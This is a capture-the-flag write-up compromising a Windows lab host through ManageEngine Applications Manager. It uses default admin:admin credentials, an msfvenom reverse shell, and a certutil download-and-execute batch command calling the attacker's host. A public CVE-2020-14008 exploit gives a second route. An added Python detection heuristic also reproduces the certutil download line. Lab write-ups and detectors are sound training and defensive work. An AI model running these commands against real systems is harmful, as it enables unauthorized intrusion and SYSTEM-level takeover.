# Metallus

## Nmap

```
sudo nmap 192.168.203.96 -p- -sS -sV                  

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
12000/tcp open  cce4x?
22222/tcp open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
40443/tcp open  unknown
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  tcpwrapped
49693/tcp open  java-rmi      Java RMI
49718/tcp open  unknown
49796/tcp open  unknown
49797/tcp open  unknown
4 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
```

Among the enumerated ports, 40443 returned no service information from Nmap. Browsing to it reveals a login page: <http://192.168.100.96:40443/index.do>

![](/files/-MWnfc75xlaHSDzUoyKA)

The footer of the page shows the software is Applications Manager (Build No: 14700). I was able to log in with a guess at the credentials `admin:admin`.

![](/files/-MWnfrNMCSTl9CSNw64f)

The target application has a feature called 'Actions', which allows scripts and files to be executed when a certain condition is met. To take advantage of this, first head to **Admin > Upload Files / Binaries** to upload a batch file containing a `cmd` command.

Before uploading, first create a reverse shell payload with `msfvenom`.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f exe -o reverse.exe
```

Once that has completed, create a batch file, since *Actions* on the target web server only execute batch files and scripts.

Create a batch file with the following command:

```bash
certutil.exe -f -urlcache -split http://<IP>/reverse.exe c:\windows\temp\reverse.exe && cmd.exe /c c:\windows\temp\reverse.exe
```

Ensure the bottom-most option, '**Upload Script to \<Product\_Home>/working/**', is selected.

![](/files/-MiSfWqvKS_MTCd2glsZ)

After uploading, head over to **Actions > Execute Program**, then create a new Action as shown in the screenshot below:

![](/files/-MiSg-abrWHqZ4MjZko2)

After creation, set up a `netcat` listener on the port specified in the `msfvenom` command, then start a Python **SimpleHTTPServer** on the attacking machine in the directory containing the `msfvenom` reverse.exe file. Then head over to **Actions > View Actions** and manually execute the script under the **Execute** tab.

We should see the script download reverse.exe from the Python **SimpleHTTPServer**.

![](/files/-MiSgigxNK6Tt5ZP123g)

Soon after, when the script executes reverse.exe, we should land a SYSTEM shell.

![](/files/-MiSgspf_Jyy7DDpdp6-)
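As an added example (not part of the original writeup), the following Python heuristic shows how a defender would spot the chain above in process-creation telemetry: certutil fetching a URL, a binary launched from C:\Windows\Temp, and cmd.exe spawned by the Applications Manager service with a script under its working/ directory. The sample events are constructed, and the Sysmon-style fields and the java.exe parent process are assumptions.

```python
import re

# Constructed sample of process-creation events (Sysmon Event ID 1 style):
# (parent image, image, command line). Invented for illustration, not logs
# from the target; the java.exe parent is an assumption about the service.
SAMPLE_EVENTS = [
    ("C:\\Program Files\\ManageEngine\\AppManager\\jre\\bin\\java.exe",
     "C:\\Windows\\System32\\cmd.exe",
     "cmd.exe /c \"C:\\Program Files\\ManageEngine\\AppManager\\working\\run.bat\""),
    ("C:\\Windows\\System32\\cmd.exe",
     "C:\\Windows\\System32\\certutil.exe",
     "certutil.exe -f -urlcache -split http://192.0.2.10/reverse.exe c:\\windows\\temp\\reverse.exe"),
    ("C:\\Windows\\System32\\cmd.exe",
     "c:\\windows\\temp\\reverse.exe",
     "c:\\windows\\temp\\reverse.exe"),
    ("C:\\Windows\\explorer.exe",  # benign certutil use, must not alert
     "C:\\Windows\\System32\\certutil.exe",
     "certutil.exe -hashfile C:\\Users\\bob\\setup.msi SHA256"),
]

# certutil invoked with -urlcache and a URL: the download step of the chain.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)
# Any executable launched directly out of C:\Windows\Temp.
TEMP_EXEC = re.compile(r"^[a-z]:\\windows\\temp\\.*\.exe$", re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(parent_image, image, command_line):
    """Return the list of finding labels that apply to one process-creation event."""
    findings = []
    name, parent = _basename(image), _basename(parent_image)
    if name == "certutil.exe" and CERTUTIL_DOWNLOAD.search(command_line):
        findings.append("certutil-url-download")
    if TEMP_EXEC.match(image):
        findings.append("exec-from-windows-temp")
    # The Applications Manager Java service running a script from its working/ dir.
    if parent == "java.exe" and name == "cmd.exe" and "\\working\\" in command_line.lower():
        findings.append("appmanager-action-launch")
    return findings


def scan(events):
    """Return (index, findings) for every event that triggers at least one label."""
    hits = []
    for i, ev in enumerate(events):
        findings = classify_event(*ev)
        if findings:
            hits.append((i, findings))
    return hits
```

Correlating the three labels on one host within a short window gives a much stronger signal than any single label on its own.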

An alternative, more scripted solution leverages **CVE-2020-14008**, which abuses JAR files.

**Description:**

Zoho ManageEngine Applications Manager 14710 and before allows an authenticated admin user to upload a vulnerable jar in a specific location, which leads to remote code execution.

**Reference:** <https://nvd.nist.gov/vuln/detail/CVE-2020-14008>

Searching for exploits with searchsploit shows an RCE exploit for build 14700.

![](/files/-MWnhvSe_9WlckR0WG5p)

{% embed url="<https://www.exploit-db.com/exploits/48793>" %}

The syntax for the exploit script is shown below:

```bash
python3 48793.py <url> <username> <password> <reverse_shell_host> <reverse_shell_port>
python3 48793.py http://<IP>:40443 admin admin <Attacker-IP> 443
```

![](/files/-MiShtQsb2FlfKNr90NU)

After execution we should have another SYSTEM shell.

![](/files/-MiSi47LEtmnHonlbKXK)
